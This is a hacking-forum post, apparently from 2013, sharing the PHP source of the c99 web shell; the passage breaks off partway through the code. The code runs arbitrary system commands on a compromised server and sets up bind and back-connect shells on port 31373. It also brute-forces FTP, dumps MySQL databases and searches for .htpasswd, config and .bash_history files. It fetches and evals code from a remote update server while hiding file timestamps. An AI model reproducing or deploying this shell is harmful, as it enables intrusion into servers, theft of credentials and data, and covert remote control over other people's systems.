Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

[Shell] c99!

  • 2 Respuestas
  • 3653 Vistas

0 Usuarios y 2 Visitantes están viendo este tema.

Desconectado Mayk0

  • *
  • Underc0der
  • Mensajes: 126
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Hacktivismo Latinoamerica
    • Email
  • Skype: maykozapata
« en: Abril 27, 2013, 10:12:41 am »
Código: PHP
  1. <?php
  2. *
  3. *  © Captain Crunch Security TeaM. Coded by tristram
  4. *
  5. ******************************************************************************************************
  6. */
  7. //Starting calls
  8. if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}}
  9. $win = strtolower(substr(PHP_OS,0,3)) == "win";
  10. define("starttime",getmicrotime());
  11. if (get_magic_quotes_gpc()) {if (!function_exists("strips")) {function strips(&$arr,$k="") {if (is_array($arr)) {foreach($arr as $k=>$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);}
  12. $_REQUEST = array_merge($_COOKIE,$_GET,$_POST);
  13. foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}}
  14.  
  15. $shver = "1.0 pre-release build #13"; //Current version
  16. //CONFIGURATION AND SETTINGS
  17. if (!empty($unset_surl)) {setcookie("c99sh_surl"); $surl = "";}
  18. elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("c99sh_surl",$surl);}
  19. else {$surl = $_REQUEST["c99sh_surl"]; //Set this cookie for manual SURL
  20. }
  21.  
  22. $surl_autofill_include = true; //If true then search variables with descriptors (URLs) and save it in SURL.
  23.  
  24. if ($surl_autofill_include and !$_REQUEST["c99sh_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}}
  25. if (empty($surl))
  26. {
  27.  $surl = "?".$includestr; //Self url
  28. }
  29. $surl = htmlspecialchars($surl);
  30.  
  31. $timelimit = 0; //time limit of execution this script over server quote (seconds), 0 = unlimited.
  32.  
  33. //Authentication
  34. $login = ""; //login
  35. //DON'T FORGOT ABOUT PASSWORD!!!
  36. $pass = ""; //password
  37. $md5_pass = ""; //md5-cryped pass. if null, md5($pass)
  38.  
  39. $host_allow = array("*"); //array ("{mask}1","{mask}2",...), {mask} = IP or HOST e.g. array("192.168.0.*","127.0.0.1")
  40. $login_txt = "Restricted area"; //http-auth message.
  41. $accessdeniedmess = "<a href=\"http://ccteam.ru/releases/c99shell\">c99shell v.".$shver."</a>: access denied";
  42.  
  43. $gzipencode = true; //Encode with gzip?
  44.  
  45. $updatenow = false; //If true, update now (this variable will be false)
  46.  
  47. $c99sh_updateurl = "http://ccteam.ru/update/c99shell/"; //Update server
  48. $c99sh_sourcesurl = "http://ccteam.ru/files/c99sh_sources/"; //Sources-server
  49.  
  50. $filestealth = true; //if true, don't change modify- and access-time
  51.  
  52. $donated_html = "<center><b>Owned by hacker</b></center>";
  53.                 /* If you publish free shell and you wish
  54.                 add link to your site or any other information,
  55.                 put here your html. */
  56. $donated_act = array(""); //array ("act1","act2,"...), if $act is in this array, display $donated_html.
  57.  
  58. $curdir = "./"; //start folder
  59. //$curdir = getenv("DOCUMENT_ROOT");
  60. $tmpdir = ""; //Folder for tempory files. If empty, auto-fill (/tmp or %WINDIR/temp)
  61. $tmpdir_log = "./"; //Directory logs of long processes (e.g. brute, scan...)
  62.  
  63. $log_email = "user@host.tld"; //Default e-mail for sending logs
  64.  
  65. $sort_default = "0a"; //Default sorting, 0 - number of colomn, "a"scending or "d"escending
  66. $sort_save = true; //If true then save sorting-position using cookies.
  67.  
  68. // Registered file-types.
  69. //  array(
  70. //   "{action1}"=>array("ext1","ext2","ext3",...),
  71. //   "{action2}"=>array("ext4","ext5","ext6",...),
  72. //   ...
  73. //  )
  74. $ftypes  = array(
  75.  "html"=>array("html","htm","shtml"),
  76.  "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"),
  77.  "exe"=>array("sh","install","bat","cmd"),
  78.  "ini"=>array("ini","inf"),
  79.  "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"),
  80.  "img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),
  81.  "sdb"=>array("sdb"),
  82.  "phpsess"=>array("sess"),
  83.  "download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar")
  84. );
  85.  
  86. // Registered executable file-types.
  87. //  array(
  88. //   string "command{i}"=>array("ext1","ext2","ext3",...),
  89. //   ...
  90. //  )
  91. //   {command}: %f% = filename
  92. $exeftypes  = array(
  93.  getenv("PHPRC")." -q %f%" => array("php","php3","php4"),
  94.  "perl %f%" => array("pl","cgi")
  95. );
  96.  
  97. /* Highlighted files.
  98.   array(
  99.    i=>array({regexp},{type},{opentag},{closetag},{break})
  100.    ...
  101.   )
  102.   string {regexp} - regular exp.
  103.   int {type}:
  104.         0 - files and folders (as default),
  105.         1 - files only, 2 - folders only
  106.   string {opentag} - open html-tag, e.g. "<b>" (default)
  107.   string {closetag} - close html-tag, e.g. "</b>" (default)
  108.   bool {break} - if true and found match then break
  109. */
  110. $regxp_highlight  = array(
  111.   array(basename($_SERVER["PHP_SELF"]),1,"<font color=\"yellow\">","</font>"), // example
  112.   array("config.php",1) // example
  113. );
  114.  
  115. $safemode_diskettes = array("a"); // This variable for disabling diskett-errors.
  116.                                                                          // array (i=>{letter} ...); string {letter} - letter of a drive
  117. //$safemode_diskettes = range("a","z");
  118. $hexdump_lines = 8;     // lines in hex preview file
  119. $hexdump_rows = 24;     // 16, 24 or 32 bytes in one line
  120.  
  121. $nixpwdperpage = 100; // Get first N lines from /etc/passwd
  122.  
  123. $bindport_pass = "c99";   // default password for binding
  124. $bindport_port = "31373"; // default port for binding
  125. $bc_port = "31373"; // default port for back-connect
  126. $datapipe_localport = "8081"; // default port for datapipe
  127.  
  128. // Command-aliases
  129. if (!$win)
  130. {
  131.  $cmdaliases = array(
  132.   array("-----------------------------------------------------------", "ls -la"),
  133.   array("find all suid files", "find / -type f -perm -04000 -ls"),
  134.   array("find suid files in current dir", "find . -type f -perm -04000 -ls"),
  135.   array("find all sgid files", "find / -type f -perm -02000 -ls"),
  136.   array("find sgid files in current dir", "find . -type f -perm -02000 -ls"),
  137.   array("find config.inc.php files", "find / -type f -name config.inc.php"),
  138.   array("find config* files", "find / -type f -name \"config*\""),
  139.   array("find config* files in current dir", "find . -type f -name \"config*\""),
  140.   array("find all writable folders and files", "find / -perm -2 -ls"),
  141.   array("find all writable folders and files in current dir", "find . -perm -2 -ls"),
  142.   array("find all service.pwd files", "find / -type f -name service.pwd"),
  143.   array("find service.pwd files in current dir", "find . -type f -name service.pwd"),
  144.   array("find all .htpasswd files", "find / -type f -name .htpasswd"),
  145.   array("find .htpasswd files in current dir", "find . -type f -name .htpasswd"),
  146.   array("find all .bash_history files", "find / -type f -name .bash_history"),
  147.   array("find .bash_history files in current dir", "find . -type f -name .bash_history"),
  148.   array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc"),
  149.   array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"),
  150.   array("list file attributes on a Linux second extended file system", "lsattr -va"),
  151.   array("show opened ports", "netstat -an | grep -i listen")
  152.  );
  153. }
  154. else
  155. {
  156.  $cmdaliases = array(
  157.   array("-----------------------------------------------------------", "dir"),
  158.   array("show opened ports", "netstat -an")
  159.  );
  160. }
  161.  
  162. $sess_cookie = "c99shvars"; // Cookie-variable name
  163.  
  164. $usefsbuff = true; //Buffer-function
  165. $copy_unset = false; //Remove copied files from buffer after pasting
  166.  
  167. //Quick launch
  168. $quicklaunch = array(
  169.  array("<img src=\"".$surl."act=img&img=home\" alt=\"Home\" height=\"20\" width=\"20\" border=\"0\">",$surl),
  170.  array("<img src=\"".$surl."act=img&img=back\" alt=\"Back\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.back(1)"),
  171.  array("<img src=\"".$surl."act=img&img=forward\" alt=\"Forward\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.go(1)"),
  172.  array("<img src=\"".$surl."act=img&img=up\" alt=\"UPDIR\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=ls&d=%upd&sort=%sort"),
  173.  array("<img src=\"".$surl."act=img&img=refresh\" alt=\"Refresh\" height=\"20\" width=\"17\" border=\"0\">",""),
  174.  array("<img src=\"".$surl."act=img&img=search\" alt=\"Search\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=search&d=%d"),
  175.  array("<img src=\"".$surl."act=img&img=buffer\" alt=\"Buffer\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=fsbuff&d=%d"),
  176.  array("<b>Encoder</b>",$surl."act=encoder&d=%d"),
  177.  array("<b>Tools</b>",$surl."act=tools&d=%d"),
  178.  array("<b>Proc.</b>",$surl."act=processes&d=%d"),
  179.  array("<b>FTP brute</b>",$surl."act=ftpquickbrute&d=%d"),
  180.  array("<b>Sec.</b>",$surl."act=security&d=%d"),
  181.  array("<b>SQL</b>",$surl."act=sql&d=%d"),
  182.  array("<b>PHP-code</b>",$surl."act=eval&d=%d"),
  183.  array("<b>Update</b>",$surl."act=update&d=%d"),
  184.  array("<b>Feedback</b>",$surl."act=feedback&d=%d"),
  185.  array("<b>Self remove</b>",$surl."act=selfremove"),
  186.  array("<b>Logout</b>","#\" onclick=\"if (confirm('Are you sure?')) window.close()")
  187. );
  188.  
  189. //Highlight-code colors
  190. $highlight_background = "#c0c0c0";
  191. $highlight_bg = "#FFFFFF";
  192. $highlight_comment = "#6A6A6A";
  193. $highlight_default = "#0000BB";
  194. $highlight_html = "#1300FF";
  195. $highlight_keyword = "#007700";
  196. $highlight_string = "#000000";
  197.  
  198. @$f = $_REQUEST["f"];
  199. @extract($_REQUEST["c99shcook"]);
  200.  
  201. //END CONFIGURATION
  202.  
  203.  
  204. //                              \/      Next code isn't for editing     \/
  205. $tmp = array();
  206. foreach($host_allow as $k=>$v) {$tmp[] = str_replace("\\*",".*",preg_quote($v));}
  207. $s = "!^(".implode("|",$tmp).")$!i";
  208. if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("<a href=\"http://ccteam.ru/releases/cc99shell\">c99shell</a>: Access Denied - your host (".getenv("REMOTE_ADDR").") not allow");}
  209. if (!empty($login))
  210. {
  211.  if (empty($md5_pass)) {$md5_pass = md5($pass);}
  212.  if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass))
  213.  {
  214.   if (empty($login_txt)) {$login_txt = strip_tags(ereg_replace("&nbsp;|<br>"," ",$donated_html));}
  215.   header("WWW-Authenticate: Basic realm=\"c99shell ".$shver.": ".$login_txt."\"");
  216.   header("HTTP/1.0 401 Unauthorized");
  217.   exit($accessdeniedmess);
  218.  }
  219. }
  220. if ($act != "img")
  221. {
  222. $lastdir = realpath(".");
  223. chdir($curdir);
  224. if ($selfwrite or $updatenow) {@ob_clean(); c99sh_getupdate($selfwrite,1); exit;}
  225. $sess_data = unserialize($_COOKIE["$sess_cookie"]);
  226. if (!is_array($sess_data)) {$sess_data = array();}
  227. if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();}
  228. if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();}
  229.  
  230. $disablefunc = @ini_get("disable_functions");
  231. if (!empty($disablefunc))
  232. {
  233.  $disablefunc = str_replace(" ","",$disablefunc);
  234.  $disablefunc = explode(",",$disablefunc);
  235. }
  236.  
  237. if (!function_exists("c99_buff_prepare"))
  238. {
  239. function c99_buff_prepare()
  240. {
  241.  global $sess_data;
  242.  global $act;
  243.  foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
  244.  foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
  245.  $sess_data["copy"] = array_unique($sess_data["copy"]);
  246.  $sess_data["cut"] = array_unique($sess_data["cut"]);
  247.  sort($sess_data["copy"]);
  248.  sort($sess_data["cut"]);
  249.  if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}}
  250.  else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}}
  251. }
  252. }
  253. c99_buff_prepare();
  254. if (!function_exists("c99_sess_put"))
  255. {
  256. function c99_sess_put($data)
  257. {
  258.  global $sess_cookie;
  259.  global $sess_data;
  260.  c99_buff_prepare();
  261.  $sess_data = $data;
  262.  $data = serialize($data);
  263.  setcookie($sess_cookie,$data);
  264. }
  265. }
  266. foreach (array("sort","sql_sort") as $v)
  267. {
  268.  if (!empty($_GET[$v])) {$$v = $_GET[$v];}
  269.  if (!empty($_POST[$v])) {$$v = $_POST[$v];}
  270. }
  271. if ($sort_save)
  272. {
  273.  if (!empty($sort)) {setcookie("sort",$sort);}
  274.  if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);}
  275. }
  276. if (!function_exists("str2mini"))
  277. {
  278. function str2mini($content,$len)
  279. {
  280.  if (strlen($content) > $len)
  281.  {
  282.   $len = ceil($len/2) - 2;
  283.   return substr($content, 0,$len)."...".substr($content,-$len);
  284.  }
  285.  else {return $content;}
  286. }
  287. }
  288. if (!function_exists("view_size"))
  289. {
  290. function view_size($size)
  291. {
  292.  if (!is_numeric($size)) {return false;}
  293.  else
  294.  {
  295.   if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
  296.   elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
  297.   elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
  298.   else {$size = $size . " B";}
  299.   return $size;
  300.  }
  301. }
  302. }
  303. if (!function_exists("fs_copy_dir"))
  304. {
  305. function fs_copy_dir($d,$t)
  306. {
  307.  $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
  308.  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
  309.  $h = opendir($d);
  310.  while (($o = readdir($h)) !== false)
  311.  {
  312.   if (($o != ".") and ($o != ".."))
  313.   {
  314.    if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
  315.    else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
  316.    if (!$ret) {return $ret;}
  317.   }
  318.  }
  319.  closedir($h);
  320.  return true;
  321. }
  322. }
  323. if (!function_exists("fs_copy_obj"))
  324. {
  325. function fs_copy_obj($d,$t)
  326. {
  327.  $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
  328.  $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
  329.  if (!is_dir(dirname($t))) {mkdir(dirname($t));}
  330.  if (is_dir($d))
  331.  {
  332.   if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
  333.   if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
  334.   return fs_copy_dir($d,$t);
  335.  }
  336.  elseif (is_file($d)) {return copy($d,$t);}
  337.  else {return false;}
  338. }
  339. }
  340. if (!function_exists("fs_move_dir"))
  341. {
  342. function fs_move_dir($d,$t)
  343. {
  344.  $h = opendir($d);
  345.  if (!is_dir($t)) {mkdir($t);}
  346.  while (($o = readdir($h)) !== false)
  347.  {
  348.   if (($o != ".") and ($o != ".."))
  349.   {
  350.    $ret = true;
  351.    if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
  352.    else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = false;}}
  353.    if (!$ret) {return $ret;}
  354.   }
  355.  }
  356.  closedir($h);
  357.  return true;
  358. }
  359. }
  360. if (!function_exists("fs_move_obj"))
  361. {
  362. function fs_move_obj($d,$t)
  363. {
  364.  $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
  365.  $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
  366.  if (is_dir($d))
  367.  {
  368.   if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
  369.   if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
  370.   return fs_move_dir($d,$t);
  371.  }
  372.  elseif (is_file($d))
  373.  {
  374.   if(copy($d,$t)) {return unlink($d);}
  375.   else {unlink($t); return false;}
  376.  }
  377.  else {return false;}
  378. }
  379. }
  380. if (!function_exists("fs_rmdir"))
  381. {
  382. function fs_rmdir($d)
  383. {
  384.  $h = opendir($d);
  385.  while (($o = readdir($h)) !== false)
  386.  {
  387.   if (($o != ".") and ($o != ".."))
  388.   {
  389.    if (!is_dir($d.$o)) {unlink($d.$o);}
  390.    else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);}
  391.   }
  392.  }
  393.  closedir($h);
  394.  rmdir($d);
  395.  return !is_dir($d);
  396. }
  397. }
  398. if (!function_exists("fs_rmobj"))
  399. {
  400. function fs_rmobj($o)
  401. {
  402.  $o = str_replace("\\",DIRECTORY_SEPARATOR,$o);
  403.  if (is_dir($o))
  404.  {
  405.   if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;}
  406.   return fs_rmdir($o);
  407.  }
  408.  elseif (is_file($o)) {return unlink($o);}
  409.  else {return false;}
  410. }
  411. }
  412. if (!function_exists("myshellexec"))
  413. {
  414. function myshellexec($cmd)
  415. {
  416.  global $disablefunc;
  417.  $result = "";
  418.  if (!empty($cmd))
  419.  {
  420.   if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
  421.   elseif (($result = `$cmd`) !== false) {}
  422.   elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
  423.   elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
  424.   elseif (is_resource($fp = popen($cmd,"r")))
  425.   {
  426.    $result = "";
  427.    while(!feof($fp)) {$result .= fread($fp,1024);}
  428.    pclose($fp);
  429.   }
  430.  }
  431.  return $result;
  432. }
  433. }
  434. if (!function_exists("tabsort")) {function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}}
  435. if (!function_exists("view_perms"))
  436. {
  437. function view_perms($mode)
  438. {
  439.  if (($mode & 0xC000) === 0xC000) {$type = "s";}
  440.  elseif (($mode & 0x4000) === 0x4000) {$type = "d";}
  441.  elseif (($mode & 0xA000) === 0xA000) {$type = "l";}
  442.  elseif (($mode & 0x8000) === 0x8000) {$type = "-";}
  443.  elseif (($mode & 0x6000) === 0x6000) {$type = "b";}
  444.  elseif (($mode & 0x2000) === 0x2000) {$type = "c";}
  445.  elseif (($mode & 0x1000) === 0x1000) {$type = "p";}
  446.  else {$type = "?";}
  447.  
  448.  $owner["read"] = ($mode & 00400)?"r":"-";
  449.  $owner["write"] = ($mode & 00200)?"w":"-";
  450.  $owner["execute"] = ($mode & 00100)?"x":"-";
  451.  $group["read"] = ($mode & 00040)?"r":"-";
  452.  $group["write"] = ($mode & 00020)?"w":"-";
  453.  $group["execute"] = ($mode & 00010)?"x":"-";
  454.  $world["read"] = ($mode & 00004)?"r":"-";
  455.  $world["write"] = ($mode & 00002)? "w":"-";
  456.  $world["execute"] = ($mode & 00001)?"x":"-";
  457.  
  458.  if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";}
  459.  if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";}
  460.  if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";}
  461.  
  462.  return $type.join("",$owner).join("",$group).join("",$world);
  463. }
  464. }
  465. if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return false;}}
  466. if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return false;}}
  467. if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return false;}}
  468. if (!function_exists("parse_perms"))
  469. {
  470. function parse_perms($mode)
  471. {
  472.  if (($mode & 0xC000) === 0xC000) {$t = "s";}
  473.  elseif (($mode & 0x4000) === 0x4000) {$t = "d";}
  474.  elseif (($mode & 0xA000) === 0xA000) {$t = "l";}
  475.  elseif (($mode & 0x8000) === 0x8000) {$t = "-";}
  476.  elseif (($mode & 0x6000) === 0x6000) {$t = "b";}
  477.  elseif (($mode & 0x2000) === 0x2000) {$t = "c";}
  478.  elseif (($mode & 0x1000) === 0x1000) {$t = "p";}
  479.  else {$t = "?";}
  480.  $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0;
  481.  $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0;
  482.  $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0;
  483.  return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w);
  484. }
  485. }
  486. if (!function_exists("parsesort"))
  487. {
  488. function parsesort($sort)
  489. {
  490.  $one = intval($sort);
  491.  $second = substr($sort,-1);
  492.  if ($second != "d") {$second = "a";}
  493.  return array($one,$second);
  494. }
  495. }
  496. if (!function_exists("view_perms_color"))
  497. {
  498. function view_perms_color($o)
  499. {
  500.  if (!is_readable($o)) {return "<font color=red>".view_perms(fileperms($o))."</font>";}
  501.  elseif (!is_writable($o)) {return "<font color=white>".view_perms(fileperms($o))."</font>";}
  502.  else {return "<font color=green>".view_perms(fileperms($o))."</font>";}
  503. }
  504. }
  505. if (!function_exists("c99getsource"))
  506. {
  507. function c99getsource($fn)
  508. {
  509.  global $c99sh_sourcesurl;
  510.  $array = array(
  511.   "c99sh_bindport.pl" => "c99sh_bindport_pl.txt",
  512.   "c99sh_bindport.c" => "c99sh_bindport_c.txt",
  513.   "c99sh_backconn.pl" => "c99sh_backconn_pl.txt",
  514.   "c99sh_backconn.c" => "c99sh_backconn_c.txt",
  515.   "c99sh_datapipe.pl" => "c99sh_datapipe_pl.txt",
  516.   "c99sh_datapipe.c" => "c99sh_datapipe_c.txt",
  517.  );
  518.  $name = $array[$fn];
  519.  if ($name) {return file_get_contents($c99sh_sourcesurl.$name);}
  520.  else {return false;}
  521. }
  522. }
  523. if (!function_exists("c99sh_getupdate"))
  524. {
  525. function c99sh_getupdate($update = true)
  526. {
  527.  $url = $GLOBALS["c99sh_updateurl"]."?version=".urlencode(base64_encode($GLOBALS["shver"]))."&updatenow=".($updatenow?"1":"0")."&";
  528.  $data = @file_get_contents($url);
  529.  if (!$data) {return "Can't connect to update-server!";}
  530.  else
  531.  {
  532.   $data = ltrim($data);
  533.   $string = substr($data,3,ord($data{2}));
  534.   if ($data{0} == "\x99" and $data{1} == "\x01") {return "Error: ".$string; return false;}
  535.   if ($data{0} == "\x99" and $data{1} == "\x02") {return "You are using latest version!";}
  536.   if ($data{0} == "\x99" and $data{1} == "\x03")
  537.   {
  538.    $string = explode("\x01",$string);
  539.    if ($update)
  540.    {
  541.     $confvars = array();
  542.     $sourceurl = $string[0];
  543.     $source = file_get_contents($sourceurl);
  544.     if (!$source) {return "Can't fetch update!";}
  545.     else
  546.     {
  547.      $fp = fopen(__FILE__,"w");
  548.      if (!$fp) {return "Local error: can't write update to ".__FILE__."! You may download c99shell.php manually <a href=\"".$sourceurl."\"><u>here</u></a>.";}
  549.      else {fwrite($fp,$source); fclose($fp); return "Thanks! Updated with success.";}
  550.     }
  551.    }
  552.    else {return "New version are available: ".$string[1];}
  553.   }
  554.   elseif ($data{0} == "\x99" and $data{1} == "\x04") {eval($string); return 1;}
  555.   else {return "Error in protocol: segmentation failed! (".$data.") ";}
  556.  }
  557. }
  558. }
  559. if (!function_exists("mysql_dump"))
  560. {
  561. function mysql_dump($set)
  562. {
  563.  global $shver;
  564.  $sock = $set["sock"];
  565.  $db = $set["db"];
  566.  $print = $set["print"];
  567.  $nl2br = $set["nl2br"];
  568.  $file = $set["file"];
  569.  $add_drop = $set["add_drop"];
  570.  $tabs = $set["tabs"];
  571.  $onlytabs = $set["onlytabs"];
  572.  $ret = array();
  573.  $ret["err"] = array();
  574.  if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");}
  575.  if (empty($db)) {$db = "db";}
  576.  if (empty($print)) {$print = 0;}
  577.  if (empty($nl2br)) {$nl2br = 0;}
  578.  if (empty($add_drop)) {$add_drop = true;}
  579.  if (empty($file))
  580.  {
  581.   $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql";
  582.  }
  583.  if (!is_array($tabs)) {$tabs = array();}
  584.  if (empty($add_drop)) {$add_drop = true;}
  585.  if (sizeof($tabs) == 0)
  586.  {
  587.   // retrive tables-list
  588.   $res = mysql_query("SHOW TABLES FROM ".$db, $sock);
  589.   if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}}
  590.  }
  591.  $out = "# Dumped by C99Shell.SQL v. ".$shver."
  592. # Home page: http://ccteam.ru
  593. #
  594. # Host settings:
  595. # MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"."
  596. # Date: ".date("d.m.Y H:i:s")."
  597. # DB: \"".$db."\"
  598. #---------------------------------------------------------
  599. ";
  600.  $c = count($onlytabs);
  601.  foreach($tabs as $tab)
  602.  {
  603.   if ((in_array($tab,$onlytabs)) or (!$c))
  604.   {
  605.    if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";}
  606.    // recieve query for create table structure
  607.    $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock);
  608.    if (!$res) {$ret["err"][] = mysql_smarterror();}
  609.    else
  610.    {
  611.     $row = mysql_fetch_row($res);
  612.     $out .= $row["1"].";\n\n";
  613.     // recieve table variables
  614.     $res = mysql_query("SELECT * FROM `$tab`", $sock);
  615.     if (mysql_num_rows($res) > 0)
  616.     {
  617.      while ($row = mysql_fetch_assoc($res))
  618.      {
  619.       $keys = implode("`, `", array_keys($row));
  620.       $values = array_values($row);
  621.       foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
  622.       $values = implode("', '", $values);
  623.       $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n";
  624.       $out .= $sql;
  625.      }
  626.     }
  627.    }
  628.   }
  629.  }
  630.  $out .= "#---------------------------------------------------------------------------------\n\n";
  631.  if ($file)
  632.  {
  633.   $fp = fopen($file, "w");
  634.   if (!$fp) {$ret["err"][] = 2;}
  635.   else
  636.   {
  637.    fwrite ($fp, $out);
  638.    fclose ($fp);
  639.   }
  640.  }
  641.  if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}}
  642.  return $out;
  643. }
  644. }
  645. if (!function_exists("mysql_buildwhere"))
  646. {
  647. function mysql_buildwhere($array,$sep=" and",$functs=array())
  648. {
  649.  if (!is_array($array)) {$array = array();}
  650.  $result = "";
  651.  foreach($array as $k=>$v)
  652.  {
  653.   $value = "";
  654.   if (!empty($functs[$k])) {$value .= $functs[$k]."(";}
  655.   $value .= "'".addslashes($v)."'";
  656.   if (!empty($functs[$k])) {$value .= ")";}
  657.   $result .= "`".$k."` = ".$value.$sep;
  658.  }
  659.  $result = substr($result,0,strlen($result)-strlen($sep));
  660.  return $result;
  661. }
  662. }
  663. if (!function_exists("mysql_fetch_all"))
  664. {
  665. function mysql_fetch_all($query,$sock)
  666. {
  667.  if ($sock) {$result = mysql_query($query,$sock);}
  668.  else {$result = mysql_query($query);}
  669.  $array = array();
  670.  while ($row = mysql_fetch_array($result)) {$array[] = $row;}
  671.  mysql_free_result($result);
  672.  return $array;
  673. }
  674. }
  675. if (!function_exists("mysql_smarterror"))
  676. {
  677. function mysql_smarterror($type,$sock)
  678. {
  679.  if ($sock) {$error = mysql_error($sock);}
  680.  else {$error = mysql_error();}
  681.  $error = htmlspecialchars($error);
  682.  return $error;
  683. }
  684. }
  685. if (!function_exists("mysql_query_form"))
  686. {
  687. function mysql_query_form()
  688. {
  689.  global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct;
  690.  if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
